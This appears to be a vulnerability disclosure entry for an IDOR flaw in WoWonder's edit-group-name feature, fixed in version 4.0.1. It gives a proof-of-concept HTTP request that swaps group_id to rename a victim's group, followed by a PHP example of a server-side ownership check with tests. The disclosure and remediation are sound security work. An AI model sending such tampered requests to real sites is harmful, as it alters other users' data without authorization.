| Field | Value |
|---|---|
| Title | Wowonder IDOR on Edit Group Name Feature |
| Source | ⚠️ https://youtu.be/b665r1ZfCg4 |
| User | fariqfgi (UID 24514) |
| Submitted | 2022-03-09 07:13 (4 years ago) |
| Moderation | 2022-03-13 12:14 (4 days later) |
| Status | Accepted |
| VulDB Entry | 194840 [Wowonder up to 4.0.0 Group Name group_id privilege escalation] |
| Points | 17 |

Description:

Software: https://codecanyon.net/item/wowonder-the-ultimate-php-social-network-platform/13785302

Vendor: https://www.wowonder.com/

Summary: An attacker can edit a group name even if it is not his own group, using only the group id.

Proof of Concept:

1. Change the group name and intercept the request using Burp Suite.
2. Edit the group_id parameter to the id of the victim's group.

Request:

```http
POST /requests.php?f=chat&s=edit_group HTTP/2
Host: demo.wowonder.com
Cookie: mycookie
Content-Length: 37
Sec-Ch-Ua: "Chromium";v="97", " Not;A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.wowonder.com/
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.wowonder.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

group_name=Takover&group_id=417&avatar=
```

I have reported this to WoWonder and it was fixed in version v4.0.1.
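The root cause of the submission above is that the edit_group endpoint acts on whatever group_id the client sends without checking that the logged-in user owns that group. The following is an added example, not WoWonder's own code and not the vendor's fix: a minimal PHP handler that performs the missing ownership check. The group table, the user ids (1001 and 2002), the function name `editGroupName` and the response shape are all constructed for illustration; the request body is the one from the report.

```php
<?php
// Added example (not WoWonder's code): the authorization check an
// "edit group name" handler needs so that group_id cannot be pointed at
// someone else's group. The data below is constructed; a real application
// would query its database instead.

declare(strict_types=1);

// Constructed sample data: group id => owner user id and current name.
$groups = [
    417 => ['owner_id' => 1001, 'name' => 'Victim Group'],
    418 => ['owner_id' => 2002, 'name' => 'Attacker Group'],
];

/**
 * Hardened handler (hypothetical). The group id still comes from the request,
 * but the update is applied only when the session user owns that group.
 *
 * @param int   $sessionUserId user id taken from the server-side session
 * @param array $post          request body (group_name, group_id, avatar)
 * @param array $groups        group table, passed by reference so the update is visible
 * @return array               JSON-style response
 */
function editGroupName(int $sessionUserId, array $post, array &$groups): array
{
    // Validate the id before touching storage; non-numeric input is rejected.
    $groupId = filter_var($post['group_id'] ?? '', FILTER_VALIDATE_INT);
    if ($groupId === false || !isset($groups[$groupId])) {
        return ['status' => 400, 'error' => 'invalid group id'];
    }

    // The IDOR check: ownership is looked up server-side, never trusted from input.
    // A 403 here is also a useful detection signal worth logging.
    if ($groups[$groupId]['owner_id'] !== $sessionUserId) {
        return ['status' => 403, 'error' => 'not the group owner'];
    }

    $name = trim((string) ($post['group_name'] ?? ''));
    if ($name === '' || strlen($name) > 60) {
        return ['status' => 400, 'error' => 'invalid group name'];
    }

    $groups[$groupId]['name'] = $name;
    return ['status' => 200, 'group_id' => $groupId, 'name' => $name];
}

// Replay of the reported request body as user 2002, who owns 418 but not 417.
parse_str('group_name=Takover&group_id=417&avatar=', $body);
$response = editGroupName(2002, $body, $groups);
if ($response['status'] !== 403 || $groups[417]['name'] !== 'Victim Group') {
    throw new RuntimeException('ownership check failed');
}
echo "Non-owner request rejected: {$response['error']}\n";

// The same body sent by the real owner (1001) is accepted.
$response = editGroupName(1001, $body, $groups);
if ($response['status'] !== 200 || $groups[417]['name'] !== 'Takover') {
    throw new RuntimeException('owner update failed');
}
echo "Owner request applied: group {$response['group_id']} is now '{$response['name']}'\n";
```

The check is deliberately tied to the session identity rather than to anything in the request, because every field the client controls (group_id included) must be treated as untrusted. Where the UI already knows which group is being edited, an even simpler design is to resolve the group from the user's own context and never accept a group id in the body at all.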